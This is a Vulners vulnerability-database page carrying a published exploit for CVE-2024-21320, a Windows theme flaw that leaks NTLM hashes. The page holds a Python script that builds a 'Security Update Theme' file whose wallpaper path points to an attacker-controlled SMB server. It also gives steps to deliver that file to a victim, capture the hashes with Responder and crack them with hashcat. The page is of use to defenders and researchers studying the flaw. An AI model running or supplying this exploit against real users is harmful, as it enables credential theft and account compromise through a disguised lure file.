Vulners
Lucene search
Microsoft Windows - NTLM Hash Leak Malicious Windows Theme
| Reporter | Title | Published | Views | Family All 39 |
|---|---|---|---|---|
 | CVE-2024-21320 | 19 Jan 202417:29 | – | circl |
 | Microsoft Windows Themes Security Vulnerability | 9 Jan 202400:00 | – | cnnvd |
 | CVE-2024-21320 | 9 Jan 202417:57 | – | cve |
 | CVE-2024-21320 Windows Themes Spoofing Vulnerability | 9 Jan 202417:57 | – | cvelist |
 | January 9, 2024—KB5034119 (OS Build 14393.6614) - EXPIRED | 22 Mar 202407:00 | – | mskb |
| January 9, 2024—KB5034121 (OS Build 22000.2713) | 9 Jan 202408:00 | – | mskb |
| January 9, 2024—KB5034122 (OS Builds 19044.3930 and 19045.3930) - EXPIRED | 9 Jan 202408:00 | – | mskb |
| January 9, 2024—KB5034123 (OS Builds 22621.3007 and 22631.3007) | 9 Jan 202408:00 | – | mskb |
| January 9, 2024—KB5034127 (OS Build 17763.5329) - EXPIRED | 9 Jan 202408:00 | – | mskb |
| January 9, 2024—KB5034129 (OS Build 20348.2227) | 9 Jan 202408:00 | – | mskb |
10
# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.
git clone https://github.com/lgandx/Responder.git
cd Responder
Replace `eth0` with your network interface.
## Step 2: Create a Malicious Windows Theme File
### Python Script to Generate the Malicious `.theme` File
import os
# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100" # Change this to your attacker's IP
# Name of the malicious theme file
theme_filename = "malicious.theme"
# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme
[Control Panel\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""
# Write the theme file
with open(theme_filename, "w") as theme_file:
theme_file.write(theme_content)
print(f"[+] Malicious theme file '{theme_filename}' created.")
# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n):
").strip().lower()
if start_http == "y":
print("[+] Starting HTTP server on port 8080...")
os.system("python3 -m http.server 8080")
```
## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:
sudo python3 Responder.py -I eth0
3. Wait for the victim to open the `.theme` file.
4. Extract NTLM hash from Responder logs and crack it using hashcat:
hashcat -m 5600 captured_hashes.txt rockyou.txt
--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita UniversityData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.16.5
EPSS0.23394
SSVC